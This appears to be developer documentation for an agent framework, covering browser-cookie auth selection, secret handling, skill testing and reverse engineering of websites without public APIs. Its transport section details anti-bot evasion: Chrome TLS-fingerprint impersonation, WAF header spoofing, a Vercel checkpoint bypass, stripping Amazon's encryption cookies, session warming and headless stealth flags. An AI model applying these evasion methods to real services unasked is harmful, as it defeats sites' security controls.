The candidate with the highest newest_cookie_at (latest per-cookie timestamp) wins. On ties, the cache wins (first candidate). No TTL — timestamps are the only arbiter.

Playwright is always skipped unless explicitly requested via the provider parameter. It’s used for reverse engineering and login automation, not runtime auth.

Provider scoring (within the provider tier)

When multiple browser providers return cookies for the same domain:

Required names — providers with all cookies listed in auth.names score highest
Creation timestamp — most recently created cookies win
Cookie count — final tiebreaker

Retry on auth failure

On SESSION_EXPIRED: prefix (or Python exceptions containing 401, 403, unauthorized, forbidden), the engine:

Marks the current provider as failed
Excludes it from the candidate list
Re-runs provider selection — next-best provider wins
Retries the operation once with the new provider’s cookies

This means a skill with stale Brave cookies and fresh Playwright cookies will automatically fall back to Playwright after Brave fails. One retry only — no infinite loops.

Explicit provider override

For testing or when auto-selection picks wrong:

run({ skill: "amazon", tool: "list_orders", provider: "playwright" })

The provider argument bypasses the selection heuristic entirely.

The names field in connection auth is purely a selection hint — it helps the engine choose the right provider. Providers always return all cookies for the domain, never a filtered subset. Skills that need the full cookie jar (which is most of them) work correctly regardless of whether names is declared.

Key rules

Never import Playwright in skill Python code. Playwright is a separate skill for investigation. Skill operations use agentos.http.
All I/O through SDK modules. http.get/post, shell.run, sql.query. Never urllib, subprocess, sqlite3, requests, httpx.
Never expose secrets in __result__. Secrets go in __secrets__ only. The agent sees masked versions via metadata.masked.
_call is same-skill only. It dispatches to sibling operations within the same skill (e.g. Gmail’s list_emails calling get_email). It cannot call operations in other skills.
Cross-skill coordination goes through the agent. If a login flow needs email access, the operation yields back to the agent (see below), and the agent uses whatever email capability is available.

Agent-in-the-loop auth flows

Some login flows require input the skill can’t obtain on its own — a verification code from email, an SMS code, or user approval. These flows must yield back to the agent rather than trying to handle the dependency internally.

Why not handle it in Python?

_call is same-skill only — Python can’t call gmail.search_emails from inside exa.py
Hardcoding a specific email skill (Gmail) couples the skill to that provider — what if the user uses Mimestream?
Blocking in Python for 60 seconds while polling gives the agent no visibility or control

The multi-step pattern

Split the flow so the agent orchestrates between agentos.http operations and Playwright when needed:

Agent calls skill.send_login_code({ email })
  → Python/agentos.http: CSRF + trigger verification email
  → Returns: { status: "code_sent", hint: "..." }

Agent checks email (any provider) and extracts the code

Agent uses Playwright to complete login (if `agentos.http` can't replay the code submission)
  → Navigate to login page, type email, submit, type code, submit
  → Extract cookies from browser

Agent calls skill.store_session_cookies({ email, session_token, ... })
  → Python/agentos.http: validates session, stores via __secrets__

The hint field tells the agent what to search for (e.g. “subject ‘Sign in to Exa Dashboard’ from exa.ai”). The agent knows how to search email — it picks the right provider and extracts the code.

Why Playwright for the code submission? Some auth implementations (e.g. Exa’s NextAuth) submit verification codes via a native HTML form POST that HTTPX cannot replay — the server-side handling differs from a programmatic POST. The fetch interceptor captures nothing, but the browser navigates successfully. When this happens, use Playwright for the form submission step and agentos.http for everything else.

When to use this pattern

Email verification codes (Exa, any NextAuth email provider)
SMS/TOTP verification
OAuth consent that requires user approval
Any flow where the skill needs external input it can’t obtain via _call
Any step where agentos.http replay fails but the browser works (native form POSTs, complex redirect chains)

Example: Exa

See skills/exa/exa.py:

send_login_code — triggers the verification email (HTTPX)
store_session_cookies — validates and stores browser-extracted session cookies (HTTPX)
The agent uses Playwright between these two operations to enter the code and complete login

Future: session-scoped state

Passing CSRF tokens through params works but is noisy. The target is session-scoped temporary storage (tied to the MCP/agent session) so Python can write state in step 1 and read it in step 2 without the agent seeing the plumbing. See the engine roadmap for “Session-scoped state for auth flows.”

For the full reverse engineering methodology, see:

Auth & Runtime — credential bootstrap lifecycle, network interception, cookie mechanics, CSRF patterns, web navigation
NextAuth.js guide — vendor-specific patterns for NextAuth/Auth.js sites
WorkOS guide — vendor-specific patterns for WorkOS-based auth

Data & Storage

Sandbox storage

Skills can persist state across runs using two reserved keys on their graph node:

cache — regeneratable state (discovered endpoints, scraped tokens). Can be cleared at any time; the skill re-discovers on next run.
data — persistent state (settings, preferences, sync timestamps). Survives cache clears.

If losing it requires user action to recover (re-entering a setting), it’s data. If the skill can regenerate it, it’s cache.

Reading

The execution context always includes .data and .cache:

{ "params": { ... }, "auth": { ... }, "data": { ... }, "cache": { ... } }

In YAML expressions:

rest:
  url: '(.cache.graphql_endpoint // "https://fallback.example.com/graphql")'

In Python, pass cache and/or data via args::

python:
  module: ./my_script.py
  function: search
  args:
    query: .params.query
    cache: .cache

Writing back

Python and command executors write back using reserved keys in their return value:

__cache__ — merged into the skill node’s cache
__data__ — merged into the skill node’s data
__result__ — the actual result callers see

def discover_endpoint(cache=None, **kwargs):
    if cache and cache.get("graphql_endpoint"):
        return {"endpoint": cache["graphql_endpoint"]}

    endpoint = _discover()
    return {
        "__cache__": {"graphql_endpoint": endpoint},
        "__result__": {"endpoint": endpoint},
    }

If neither __cache__ nor __data__ is present, the result passes through unchanged. Fully backward compatible.

`secrets` — secret store writes

A third reserved key, __secrets__, handles importing secrets from external sources (password managers, payment info, identity documents, etc.) into the credential store. The __secrets__ handler is pure credential store CRUD — it writes credential rows and strips the key. It does not create graph entities or edges; entity creation happens through the normal adapter pipeline processing __result__. The two systems are joined by (issuer, identifier).

def import_items(vault, dry_run=False):
    items = fetch_from_source(vault)
    if dry_run:
        return [{"issuer": i["issuer"], "label": i["label"]} for i in items]

    return {
        # Secrets → credential store (engine writes rows, strips key)
        "__secrets__": [
            {
                "item_type": "password",
                "issuer": "github.com",
                "identifier": "joe",
                "label": "GitHub",
                "source": "mymanager",
                "value": {"password": "..."},
                "metadata": {"masked": {"password": "••••••••"}}
            },
            {
                "item_type": "credit_card",
                "issuer": "chase",
                "identifier": "visa-4242",
                "label": "Personal Visa",
                "source": "mymanager",
                "value": {"card_number": "4111111111114242", "cvv": "123"},
                "metadata": {"masked": {"card_number": "••••4242", "cvv": "•••"}}
            }
        ],
        # Entities → shaped by adapters into graph nodes
        "__result__": [
            {"issuer": "github.com", "identifier": "joe", "title": "GitHub",
             "category": "LOGIN", "url": "https://github.com", "username": "joe"},
            {"issuer": "chase", "identifier": "visa-4242", "title": "Personal Visa",
             "category": "CREDIT_CARD", "cardholder": "Joe", "card_type": "Visa",
             "expiry": "12/2027", "masked": {"card_number": "••••4242", "cvv": "•••"}}
        ]
    }

The trust model: Python sees secrets (it reads them from the source), the engine intercepts and encrypts them, the agent never sees them — only metadata (including masked representations). Graph entities carry masked previews (“Visa ending in 4242”) so the agent can reason about which card to use without seeing the full number.

See spec/credential-system.md and spec/1password-integration.md in the engine repo for full design.

Status: Implemented (Phase A). The engine intercepts __secrets__ in process_storage_writeback(), writes credential rows to credentials.sqlite, creates account entities and claims edges on the graph, then strips the key before the MCP response.

Leading by example: skills/goodreads/public_graph.py (GraphQL endpoint discovery cached via __cache__).

Expressions

Use one expression style everywhere:

rest:, graphql:, command:, python:, and connection auth fields all use jq/jaq-style expressions
Resolved credentials are available under .auth.* such as .auth.key or .auth.access_token

Common jq/jaq patterns:

url: '"/items/" + .params.id'
query:
  q: .params.query
  limit: .params.limit // 10
body:
  title: .params.title

Common command patterns:

command:
  binary: python3
  args:
    - ./my_script.py
    - run
  stdin: '.params | tojson'

When a command: argument or working_dir: looks like a relative file path, it is resolved relative to the skill folder. Prefer ./my_script.py over machine-specific absolute paths.

If you need advanced command, steps, or crypto behavior, copy from an existing skill.

Views & Output

The run tool accepts:

view:
  detail: preview | full
  format: markdown | json

Rules:

detail changes data volume
format changes representation
Default is markdown preview
Preview keeps canonical fields and truncates long text
Full returns all mapped fields
JSON returns a { data, meta } envelope

This is why canonical mapping fields matter — the renderer uses them to produce consistent previews across all skills. See Adapters for the canonical field table.

Testing & Validation

Shape validation: `agentos test`

The primary tool for validating that skill output matches declared shapes. Run it after any skill change.

agentos test hackernews                    # test all operations
agentos test amazon --op search_products   # test one operation

This loads skill.yaml and shapes/*.yaml from disk, executes each testable operation, and validates the output field-by-field against the shape. No running engine needed.

  hackernews
  ──────────
  list_posts (post[])
    ✓ 20 records returned (485ms)
    ✓ author — 20/20 valid
    ✓ datePublished — 20/20 valid
    ✓ name — 20/20 valid
    ✓ url — 20/20 valid
    ⚠ 3 extra fields not in shape: account, engagement, skill
  search_posts (post[]) — skipped (required params missing from test.params)

  4 operations · 1 tested · 3 skipped

Test configuration

Add a test: block to operations in skill.yaml to provide test params or skip dangerous operations:

operations:
  search_products:
    returns: product[]
    test:
      params:                    # input params for test execution
        query: "usb c cable"

  create_order:
    returns: order
    test:
      skip: true                 # has side effects — don't auto-run

Field	Type	Default	Purpose
`params`	object	`{}`	Params passed to the operation during test
`skip`	boolean	`false`	Skip this operation in automated test runs

When operations are skipped:

skip: true — explicitly opted out
Required params have no defaults and no test.params
returns is void or an inline schema (not a shape reference)
The shape referenced in returns doesn’t exist in the registry

When operations run:

Operations with no params run automatically
Operations with all-optional params (or params with defaults) run automatically
Operations with test.params covering required params run with those params

Direct MCP testing

For inspecting the full MCP response (including rendering, entity extraction, and metadata), use direct MCP calls:

Skill-level testing (community repo)

mcp:call and mcp:test automatically use the newest built agentos binary. Set AGENTOS_BINARY=/path/to/agentos if you need to force a specific one.

# JSON preview
npm run mcp:call -- \
  --skill exa --tool search \
  --params '{"query":"rust ownership","limit":1}' \
  --format json --detail preview

# JSON full
npm run mcp:call -- \
  --skill exa --tool search \
  --params '{"query":"rust ownership","limit":1}' \
  --format json --detail full

# Markdown full (raw MCP response)
npm run mcp:call -- \
  --skill exa --tool search \
  --params '{"query":"rust ownership","limit":1}' \
  --detail full --raw

Engine-level testing (core repo)

The core repo has a generic MCP test harness at ~/dev/agentos/scripts/mcp-test.mjs that speaks raw JSON-RPC to the engine binary:

cd ~/dev/agentos

# List all MCP tools (built-in + dynamic)
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp"

# Call a dynamic capability tool
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp" call web_search '{"query":"rust"}'

Use this when you’re changing provides: entries, engine routing, or tool schemas.

Quick smoke test: `agentos call`

Native Rust MCP client built into the binary — fastest path for one-off checks:

agentos call boot                                    # verify engine is alive
agentos call run '{"skill":"exa","tool":"search","params":{"query":"test"}}'

Validation

Before committing a skill:

npm run validate                           # schema + structural checks
agentos test <skill>                       # shape validation
npm run mcp:call -- --skill <skill> ...    # inspect full MCP output

What validate catches:

Schema shape and unknown keys (via audit-skills.py vs Rust types.rs)
Basic structural problems
Advisory duplicate adapter mappings

What agentos test catches:

Field type mismatches (value doesn’t match declared shape type)
Extra fields returned but not declared in the shape
Missing shape fields (info only — fields are optional)
Relation target validation (nested records checked recursively)

Checklist

Before you commit a skill:

npm run validate passes
agentos test <skill> passes (no field errors)
Direct MCP preview/full output looks correct
Uses inline returns: schemas for non-entity or action-style tools
Read-safe ops have test.params for automated testing
Mutating ops declare test.skip: true
Multi-connection skill declares connection: on each operation
REST URLs are relative when the connection has a base_url
If the contract changed, the book is updated in the same PR

Reverse Engineering

How to build skills against web services that don’t have public APIs. This is the methodology for extracting data surfaces, auth flows, and content from any website — then packaging them as reliable AgentOS skills.

The layers

Each layer builds on the previous. Start at transport, work up.

Layer	What it covers	When you need it
1. Transport	TLS fingerprinting, WAF bypass, Playwright stealth, HTTP/2	Service blocks automated requests
2. Discovery	Next.js/Apollo caches, JS bundle config, GraphQL schema scanning	Finding API endpoints and data shapes
3. Auth & Runtime	Credential bootstrap, login/signup flows, CSRF, cookies, API key management, network interception	Logging in and managing session state
4. Content	Pagination, infinite scroll, content extraction	Scraping actual data from pages
5. Social Networks	Social graph traversal, friend lists, activity feeds	Working with social platforms
6. Desktop Apps	Electron asar extraction, native app IPC, plist configs	Local apps without web APIs
7. MCP Servers	Wrapping existing MCP servers as skills	When someone already built an MCP server

Core principle

CDP discovers, agentos.http runs.

Use browse capture (CDP to a real browser) to investigate — navigate pages, capture every network request with full headers and response bodies, inspect cookies. Then implement what you learned as Python + agentos.http in the skill. No browser at runtime.

Why CDP to real browsers, not Playwright? Playwright’s bundled Chromium has a detectable TLS fingerprint (JA3/JA4) that anti-bot systems flag. CDP to the user’s real Brave/Chrome produces authentic TLS fingerprints, real GPU canvas rendering, and uses existing sessions. Sites like Amazon reject Playwright but accept real browsers. See Transport for the full analysis.

Headers are built in Python via http.headers() with independent knobs (waf=, accept=, mode=, extra=). The Rust engine is pure transport — it sets zero default headers.

The progression:

Search — check web_search for prior art, existing docs, API references.
Discover — use browse capture to probe the live site via CDP. Launch Brave with --remote-debugging-port=9222 --remote-allow-origins="*", then python3 bin/browse-capture.py <url> --port 9222. Captures all requests, responses, headers, cookies, and API response bodies automatically.
Extract API surface — grep the site’s JS bundles for endpoint patterns (e.g. grep -oE 'get[A-Z][a-zA-Z]+V[0-9]+' bundle.js). This reveals the full API surface without navigating every page.
Replay — reproduce what you found with agentos.http + cookies. Use http.headers() for WAF bypass. Test with agentos browse request <skill> <url>.
Implement — write the skill operation in Python with agentos.http. No browser dependency at runtime.
Test — agentos test-skill <skill> validates against shapes and expectations.

Browse toolkit commands

Command	What it does
`agentos browse request <skill> <url>`	Make an authenticated HTTP request (same TLS fingerprint as engine), show full headers, cookies, response
`agentos browse cookies <skill>`	Cookie inventory — all cookies from all sources with timestamps and provenance
`agentos browse auth <skill>`	Auth resolution trace — which provider won, identity, timing
`python3 bin/browse-capture.py <url> --port 9222`	CDP network capture — navigate Brave to a URL, capture every request/response with full headers and bodies

See Browse Toolkit spec for details.

See Auth & Runtime for the full methodology, including:

Credential Bootstrap Lifecycle — the five-phase pattern from entry through API key storage
Network Interception — three layers: capture_network for page-load, fetch interceptors for user interactions, DOM inspection for native form POSTs
Cookie Mechanics — SameSite, HttpOnly, cross-domain behavior, extraction methods
CSRF Patterns — double-submit cookies, synchronizer tokens, NextAuth CSRF
Web Navigation — redirect chains, interstitials, signup vs login, API key management flows
Playwright Gotchas — type vs fill for React forms, honeypot fields, and when HTTPX replay fails
Vendor guides — NextAuth.js, WorkOS

Write operations — replay, don’t reconstruct

Write operations (creating orders, adding to carts, submitting forms) are where most RE bugs hide. The API accepts your request (200 OK) but stores degraded data because your payload was subtly wrong.

Principles

1. Replay, don’t reconstruct. Capture a working browser request and replay its exact structure. If the browser sends 15 fields on a cart item, send 15 fields. Don’t “simplify” to the 6 you think matter. The 9 you dropped might include section UUIDs, selling options, or measurement types that the server needs to properly resolve the item.

2. Trace data provenance. For every field in a write request, document which read endpoint provided the value. Don’t just document the shape — document the data flow:

getStoreV1.catalogSectionsMap[secKey][i].catalogSectionUUID
  → addItemsToDraftOrderV2.items[].sectionUuid

getStoreV1...catalogItems[].sectionUUID
  → addItemsToDraftOrderV2.items[].sectionUuid (different! item-level, not parent)

3. Compare field-by-field. After making a write call, compare your result against browser-created state. Don’t just check “200 OK” or “items exist.” Check: do items have images? Prices? Can the browser render them normally? Grayed-out images or “Nothing to eat here” means your data was accepted but degraded.

4. Preserve raw data. When extracting from a read endpoint, keep the original response data alongside your clean shape. Your clean shape is for display; the raw data is for downstream write operations that need the exact fields the API expects back. Don’t lossy-extract into your own shape and throw away the original.

5. Hook BOTH fetch AND XHR. Some sites use fetch() for reads but XMLHttpRequest for writes (Uber Eats does this). If you only hook one, you’ll miss the write calls entirely.

6. No silent fallbacks on writes. Never use raw.get("X") or alternative_source for fields in write operations. If the field is missing, fail loudly — the error message will reveal the actual bug (wrong casing, wrong nesting, missing data). The or pattern is fine for display but poison for writes: the API silently accepts wrong data and you don’t find out until the UI shows “unavailable” or grayed-out images.

Real example: Uber Eats cart bug

We captured addItemsToDraftOrderV2 and built item payloads ourselves. The API returned 200, items appeared in the cart with correct names and prices. But images were grayed out and clicking items showed “Nothing to eat here.” Root cause: we used the wrong sectionUuid and subsectionUuid (same UUID for all items instead of per-item values from the catalog), and omitted sellingOption. The server accepted the items but couldn’t resolve them against the catalog properly.

Fix: pass through the raw catalog item data from getStoreV1 instead of reconstructing it.

Starting a new reverse-engineered skill

npm run new-skill -- my-service

# Then start investigating:
# 1. Open the service in Playwright
# 2. capture_network to find API endpoints
# 3. inspect to understand page structure
# 4. Document what you find in requirements.md
# 5. Implement with httpx in Python

For detailed examples, see each layer’s documentation. Real-world reference implementations:

Skill	What it demonstrates
`skills/uber/`	Two completely different APIs on one platform — rides use GraphQL (`riders.uber.com/graphql`), Eats uses RPC (`ubereats.com/_p/api/`). CDP `browse capture` for API discovery, JS bundle grepping for full endpoint surface (32 endpoints extracted), receipt HTML parsing with `data-testid` selectors, real-time event channels (SSE), separate cookie domains. Reference for CDP-based discovery and RPC API reverse engineering.
`skills/amazon/`	Deep anti-bot bypass (client hints, Siege encryption, session warming), session staleness (30-min TTL, CDP session warming), fallback CSS selector chains for resilient HTML parsing, AJAX endpoints for dynamic content, `SESSION_EXPIRED` provider retry convention, tiered cookie architecture. Full reference for 1-transport and 4-content.
`skills/exa/`	Full credential bootstrap: NextAuth email code → Playwright form submit → session cookies → API key extraction from dashboard API. Reference for nextauth.md
`skills/goodreads/`	Multi-tier discovery, Apollo cache extraction, auth boundary mapping, runtime config fallback
`skills/claude/`	Cookie-based auth, Cloudflare stealth settings, API replay from browser session
`skills/austin-boulder-project/`	JS bundle config extraction, tenant-namespace auth

Reverse Engineering — Transport & Anti-Bot

How to get a response from a server that doesn’t want to talk to you.

This is Layer 1 of the reverse-engineering docs:

Layer 1: Transport (this file) — TLS fingerprinting, headers, WAF bypass, headless stealth
Layer 2: Discovery — 2-discovery — finding structured data in pages and bundles
Layer 3: Auth & Runtime — 3-auth — credentials, sessions, rotating config
Layer 4: Content — 4-content — extracting data from HTML when there is no API
Layer 5: Social Networks — 5-social — modeling people, relationships, and social graphs
Layer 6: Desktop Apps — 6-desktop-apps — macOS, Electron, local state, unofficial APIs
Layer 7: MCP Servers — 7-mcp — discovering, probing, and evaluating remote/stdio MCPs

HTTP Client — `agentos.http` Routes Through the Engine

The short answer

from agentos import http

# Default — works for most JSON APIs
resp = http.get(url, **http.headers(accept="json"))

# Behind CloudFront/Cloudflare — WAF headers + HTTP/2
resp = http.get(url, **http.headers(waf="cf", accept="json"))

# Full page navigation (Amazon, Goodreads)
with http.client(cookies=cookie_header) as c:
    resp = c.get(url, **http.headers(waf="cf", mode="navigate", accept="html"))

All HTTP goes through the Rust engine via agentos.http. The engine handles transport mechanics (HTTP/2, cookie jars, decompression, timeouts, logging). Headers are built in Python via http.headers() — the engine sets zero default headers.

Default rule: ALWAYS use http.headers(). Never construct headers dicts manually. We are acting as a real browser (Brave/Chrome). There is no reason to NOT send proper browser headers. Without http.headers(), you get no User-Agent, no sec-ch-, no Sec-Fetch- — and some APIs silently reject you with 500 or 403. Pass service-specific headers (CSRF tokens, session IDs) via the extra= parameter.
# WRONG — no browser headers, will fail on strict endpoints
http.post(url, cookies=cookies, headers={"x-csrf-token": "x"}, json=body)

# RIGHT — browser-grade headers + service-specific extras
http.post(url, cookies=cookies, json=body,
          **http.headers(waf="cf", accept="json", extra={"x-csrf-token": "x"}))

TLS fingerprinting — why the engine uses wreq with BoringSSL

AWS WAF, Cloudflare, and other CDNs compute a JA3/JA4 fingerprint from every TLS ClientHello and compare it to the claimed User-Agent. If the UA says “Chrome 131” but the TLS fingerprint says “rustls” or “urllib3,” the request gets flagged as a bot. Sensitive pages (Amazon orders, Chase banking, account settings) have higher anomaly thresholds than product pages — so the homepage works but the orders page redirects to login.

The engine uses wreq (a reqwest fork) backed by BoringSSL — the same TLS library Chrome uses. With Emulation::Chrome131, every request produces an authentic Chrome JA4 fingerprint (t13d1516h2_8daaf6152771), including correct HTTP/2 SETTINGS frames, pseudo-header order, and WINDOW_UPDATE values. This is not string-matching — wreq constructs the same ClientHello Chrome would, using the same library, and the fingerprint falls out naturally.

Verified (2026-04-01): Same cookies from Brave Browser. reqwest (rustls) → Amazon redirects to signin. wreq (BoringSSL, Chrome 131) → Amazon returns 7 orders. The only difference was the TLS fingerprint.

Python clients (requests, httpx) have similar issues — requests/urllib3 has a blocklisted JA3 hash (8d9f7747675e24454cd9b7ed35c58707). Skills don’t hit this because all HTTP goes through the engine’s wreq client, not Python libraries directly.

When to use `http2=False` (Vercel)

Vercel Security Checkpoint blocks HTTP/2 clients outright — every request returns 429 with a JS challenge page, regardless of cookies or headers. But HTTP/1.1 passes cleanly.

In http.headers(), this is handled by the waf= knob:

# waf="cf" → http2=True (CloudFront/Cloudflare need HTTP/2)
resp = http.get(url, **http.headers(waf="cf", accept="json"))

# waf="vercel" → http2=False (Vercel blocks HTTP/2)
resp = http.get(url, **http.headers(waf="vercel", accept="json"))

The WAF template automatically sets the right http2 value. No need to remember which WAF needs what.

Not every Vercel-hosted endpoint enables the checkpoint. During Exa testing, auth.exa.ai (Vercel, no checkpoint) accepted h2; dashboard.exa.ai (Vercel, checkpoint enabled) rejected it. The checkpoint is a per-project Vercel Firewall setting — you have to test each subdomain.

Tested against dashboard.exa.ai (Vercel + Cloudflare):

	`http2=True`	`http2=False`
session + cf_clearance	429	200
session only	429	200
no cookies at all	429	200 (empty session)

Cookies and headers are irrelevant — the checkpoint triggers purely on the HTTP/2 TLS fingerprint.

Rule of thumb: use waf="cf" for CloudFront/Cloudflare, waf="vercel" for Vercel. If you get 429 from Vercel, it’s the HTTP/2 fingerprint. If you get 403 from CloudFront, you need HTTP/2 + client hints.

Diagnostic protocol: isolating the variable

When a request fails, don’t guess — isolate. Test each transport variable independently to find the one that matters:

Step 1: Try httpx http2=True (default)
  → Works?     Done.
  → 429/403?   Continue.

Step 2: Try httpx http2=False
  → Works?     Vercel Security Checkpoint. Use http2=False, done.
  → Still 403? Continue.

Step 3: Try with full browser-like headers (Sec-Fetch-*, Sec-CH-UA, etc.)
  → Works?     WAF header check. Add headers, done.
  → Still 403? Continue.

Step 4: Try with valid session cookies
  → Works?     Auth required. Handle login first.
  → Still 403? It's TLS fingerprint-level.

Step 5: Use curl_cffi with Chrome impersonation
  → Works?     Strict JA3/JA4 enforcement. Use curl_cffi.
  → Still 403? Something non-standard (CAPTCHA, IP block).

The key insight from the Exa reverse engineering session: test one variable at a time. During Exa testing, we created a matrix of http2=True/False x cookies/no-cookies x headers/no-headers and discovered that ONLY the h2 setting mattered. Cookies and headers were completely irrelevant to the Vercel checkpoint. This prevented unnecessary complexity in the skill code.

You don’t need `curl_cffi` or `httpx`

The engine’s wreq client already emits Chrome’s exact TLS cipher suites, GREASE values, extension ordering, ALPN, and HTTP/2 SETTINGS frames. Skills should never use httpx, requests, or curl_cffi directly — agentos.http handles all of this automatically.

All I/O through SDK modules

Skills must use agentos.http for all HTTP — never urllib, requests, httpx, or subprocess directly. All I/O goes through SDK modules (http.get/post, shell.run, sql.query) so the engine can log, gate, and manage requests.

Browser-Like Headers — `http.headers()` Knobs

Headers are built in Python via http.headers(), which composes four independent concerns:

from agentos import http

# Four knobs, ordered by network layer:
conf = http.headers(
    waf="cf",            # WAF vendor — "cf", "vercel", or None
    ua="chrome-desktop", # User-Agent — preset name or raw string
    mode="fetch",        # Request type — "fetch" (XHR) or "navigate" (page load)
    accept="json",       # Content — "json", "html", or "any"
    extra={"X-Custom": "value"},  # Merge last, overrides anything
)
# Returns {"headers": {...}, "http2": True/False}
# Spread into http.get/post/client with **
resp = http.get(url, **conf)

What each knob controls

Knob	What it sets	Values
`waf`	Client hints (`Sec-CH-UA`, etc.) + `http2`	`"cf"` (CloudFront/Cloudflare, http2=True), `"vercel"` (http2=False), `None`
`ua`	`User-Agent` header	`"chrome-desktop"`, `"chrome-mobile"`, `"safari-desktop"`, or raw string
`mode`	`Sec-Fetch-*` headers (only when `waf` is set)	`"fetch"` (XHR: dest=empty, mode=cors), `"navigate"` (page: dest=document, mode=navigate + device hints)
`accept`	`Accept` header	`"json"`, `"html"`, `"any"` (default: `/`)
`extra`	Custom headers merged last	Any dict — auth tokens, CSRF, Origin, Referer, etc.

Standard headers (always included)

Every http.headers() call sets User-Agent, Accept-Language, and Accept-Encoding. These are normal browser headers — not WAF-specific. Override via extra= if needed.

WAF headers — `waf="cf"` and `mode="navigate"`

When waf is set, http.headers() adds Sec-Fetch-* metadata. The mode knob controls what type of request you’re simulating:

mode="fetch" (default) — XHR/fetch() API call:

Sec-Fetch-Dest: empty, Sec-Fetch-Mode: cors, Sec-Fetch-Site: same-origin

mode="navigate" — Full page navigation (used by Amazon, Goodreads):

Sec-Fetch-Dest: document, Sec-Fetch-Mode: navigate, Sec-Fetch-User: ?1
Plus device hints: Device-Memory, Downlink, DPR, ECT, RTT, Viewport-Width
Plus Cache-Control: max-age=0, Upgrade-Insecure-Requests: 1

Amazon’s Lightsaber bot detection checks these device hints. Without them, auth pages redirect to login. The mode="navigate" knob handles all of this automatically.

`Sec-Fetch-Site` values

Scenario	Value	How to set
JS on `app.example.com` calling `app.example.com/api`	`same-origin`	Default in `mode="fetch"`
Full page navigation (user typed URL)	`none`	Default in `mode="navigate"`
Cross-origin API call	`cross-site`	`extra={"Sec-Fetch-Site": "cross-site"}`

Common patterns

from agentos import http

# JSON API, no WAF (Gmail, Linear, Todoist — 15 skills)
resp = http.get(url, **http.headers(accept="json", extra={"Authorization": f"Bearer {token}"}))

# HTML scraping behind CloudFront (Amazon, Goodreads)
with http.client(cookies=cookie_header) as c:
    resp = c.get(url, **http.headers(waf="cf", mode="navigate", accept="html"))

# JSON API behind Cloudflare (Claude.ai)
# Claude needs custom Sec-CH-UA (Brave v146) and http2=False
conf = http.headers(waf="cf", accept="json", extra=CLAUDE_HEADERS)
conf["http2"] = False  # override WAF default
with http.client(cookies=cookie_header, **conf) as c:
    resp = c.get(url)

# Vercel checkpoint bypass (Exa)
resp = http.get(url, **http.headers(waf="vercel", accept="json"))

# Full control — skip helpers entirely
resp = http.get(url, headers={"Accept": "text/csv", "X-Custom": "value"})

# Debug — print what you're sending
print(http.headers(waf="cf", mode="navigate", accept="html"))

Version drift

The Chrome version in Sec-CH-UA is pinned in sdk/agentos/http.py (_UA and _WAF dicts). If you start getting unexpected 403s months later, the pinned version may be too old. Update the version strings in the SDK to match the current stable Chrome release.

How to discover the right headers

Use the Playwright skill’s capture_network or the fetch interceptor to see exactly what headers a real browser sends on the same request. Compare with http.headers() output and add any missing ones via extra=.

Some sites inject JavaScript-driven features via cookies. When you’re scraping with HTTPX (no JS engine), these features produce unusable output. The fix: strip the trigger cookies so the server falls back to plain HTML.

Amazon’s Siege Encryption

Amazon uses a system called SiegeClientSideDecryption to encrypt page content client-side. When the csd-key cookie is present, Amazon sends encrypted HTML blobs instead of readable content. The browser decrypts them with JavaScript; HTTPX gets unreadable garbage.

Solution: strip the trigger cookies using skip_cookies= on http.client():

_SKIP_COOKIES = ["csd-key", "csm-hit", "aws-waf-token"]

with http.client(cookies=cookie_header, skip_cookies=_SKIP_COOKIES,
                 **http.headers(waf="cf", mode="navigate", accept="html")) as c:
    resp = c.get(url)

The engine filters these cookies out of the jar before sending. With csd-key stripped, Amazon serves plain, parseable HTML. The csm-hit and aws-waf-token cookies are also stripped — they’re telemetry/WAF cookies that can trigger additional client-side behavior.

Diagnosing encryption

If your HTML responses contain garbled content, long base64 strings, or empty containers where data should be, check for client-side decryption:

Compare the page source in the browser (View Source, not DevTools Elements) with your HTTPX response
Search for keywords like decrypt, Siege, clientSide in the page JS
Try stripping cookies one at a time to find which one triggers encryption

Reference: skills/amazon/amazon.py SKIP_COOKIES.

Response Decompression — You Must Handle What You Advertise

When you send Accept-Encoding: gzip, deflate, br, zstd (as all browser-like profiles do), the server will compress its response. Your HTTP client must decompress it. If it doesn’t, you get raw binary garbage instead of HTML — and every parser returns zero results.

This is a silent failure. The HTTP status is 200, the headers look normal, and Content-Length is reasonable. But resp.text is garbled bytes. It looks like client-side encryption (see above), but the cause is much simpler: the response is compressed and you’re not decompressing it.

How `agentos.http` handles it

The Rust HTTP engine uses wreq with gzip, brotli, deflate, and zstd feature flags enabled. Decompression is automatic and transparent — resp["body"] is always plaintext.

Why this matters

Brotli (RFC 7932) is a compression algorithm designed by Google for the web. It compresses 20-26% better than gzip on HTML/CSS/JS. Every modern browser supports it, and servers aggressively use it for large pages. Amazon’s order history page, for example, returns ~168KB of brotli-compressed HTML. Without decompression, you get 168KB of binary noise and zero order cards.

The trap: small pages (homepages, API endpoints) may not be compressed or may use gzip which some clients handle by default. Large pages (order history, dashboards, search results) almost always use brotli. So your skill works on simple endpoints and silently fails on the important ones.

Diagnostic

If your response body contains non-UTF-8 bytes, starts with garbled characters, or contains no recognizable HTML despite a 200 status:

Check the response Content-Encoding header — if it says br, gzip, or zstd, the body is compressed
Verify your HTTP client has decompression enabled
In agentOS: agentos.http handles this automatically. If you’re using raw urllib.request, it does NOT decompress brotli

Reference: Cargo.toml wreq features — gzip, brotli, deflate, zstd.

Session Warming

Some services track request patterns and flag direct deep-links from an unknown session as bot traffic. The fix: warm the session by visiting the homepage first, then navigate to the target page.

def _warm_session(client) -> None:
    """Visit homepage first to provision session cookies."""
    client.get("https://www.amazon.com/", headers={"Sec-Fetch-Site": "none"})

This establishes the session context (cookies, CSRF tokens, tracking state) before hitting authenticated pages. Without it, Amazon redirects order history and account pages to the login page even with valid session cookies.

When to warm:

Before any authenticated page fetch (order history, account settings)
When the first request to a deep URL returns a login redirect despite valid cookies
When you see WAF-level blocks only on direct navigation

When warming isn’t needed:

API endpoints (JSON responses) — they don’t use page-level session tracking
Public pages without authentication
Sites where direct deep-links work fine (test first)

Reference: skills/amazon/amazon.py _warm_session().

Headless Browser Stealth

Default Playwright/Chromium gets blocked by many sites (Goodreads returns 403, Cloudflare serves challenge pages). The fix is a set of anti-fingerprinting settings.

Minimum stealth settings

from playwright.sync_api import sync_playwright

with sync_playwright() as p:
    browser = p.chromium.launch(
        headless=True,
        args=["--disable-blink-features=AutomationControlled"],
    )
    context = browser.new_context(
        user_agent=(
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) "
